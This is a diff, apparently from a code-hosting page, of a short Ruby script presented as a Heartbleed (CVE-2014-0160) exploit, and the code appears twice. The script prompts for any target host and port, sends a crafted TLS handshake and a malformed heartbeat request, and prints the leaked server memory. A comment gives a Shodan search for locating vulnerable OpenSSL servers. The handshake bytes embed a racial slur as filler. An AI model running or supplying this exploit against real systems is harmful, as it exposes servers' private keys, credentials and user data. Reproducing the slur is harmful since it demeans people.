komodoooo · February 16, 2024 10:11
diff --git a/heartbleed.rb b/heartbleed.rb
 require 'socket'

 puts """
 CVE-2014-0160
 OpenSSL 'Heartbleed' buffer over-read exploit
 By Komodo\n
 """

 =begin
 Shodan dork to search vulnerable targets:
 "OpenSSL/1.0.1", "OpenSSL/1.0.1a" trough "OpenSSL/1.0.1f"
 =end

 def main(address)
    hello = "\x16\x03\x02\x004\x01\x00\x000\x03\x02a]\x9a\xcbITLOOKSLIKEAGLOWING"+
            "CIANIGGER\x00\x00\x02\x00/\x01\x00\x00\x05\xff\x01\x00\x01\x00"
    payload = "\x18\x03\x02\x00\x03\x01\xff\xff"
    print "Port (press enter for default 443): "
    port = gets.chomp
    s = TCPSocket.new(address,port.empty??443:port.to_i)
    s.sendmsg(hello)
    s.recv(8192)
    s.sendmsg(payload)
    return "\n#{address} Memory dump:\n\n#{s.recv(65536)}\n"
 end

 begin
    print "Address/domain: "
    puts(main(gets.chomp))
 rescue => e
    abort("\nError: #{e}\n\n")
 end
	require 'socket'

	puts """
	CVE-2014-0160
	OpenSSL 'Heartbleed' buffer over-read exploit
	By Komodo\n
	"""

	=begin
	Shodan dork to search vulnerable targets:
	"OpenSSL/1.0.1", "OpenSSL/1.0.1a" trough "OpenSSL/1.0.1f"
	=end

	def main(address)
	hello = "\x16\x03\x02\x004\x01\x00\x000\x03\x02a]\x9a\xcbITLOOKSLIKEAGLOWING"+
	"CIANIGGER\x00\x00\x02\x00/\x01\x00\x00\x05\xff\x01\x00\x01\x00"
	payload = "\x18\x03\x02\x00\x03\x01\xff\xff"
	print "Port (press enter for default 443): "
	port = gets.chomp
	s = TCPSocket.new(address,port.empty??443:port.to_i)
	s.sendmsg(hello)
	s.recv(8192)
	s.sendmsg(payload)
	return "\n#{address} Memory dump:\n\n#{s.recv(65536)}\n"
	end

	begin
	print "Address/domain: "
	puts(main(gets.chomp))
	rescue => e
	abort("\nError: #{e}\n\n")
	end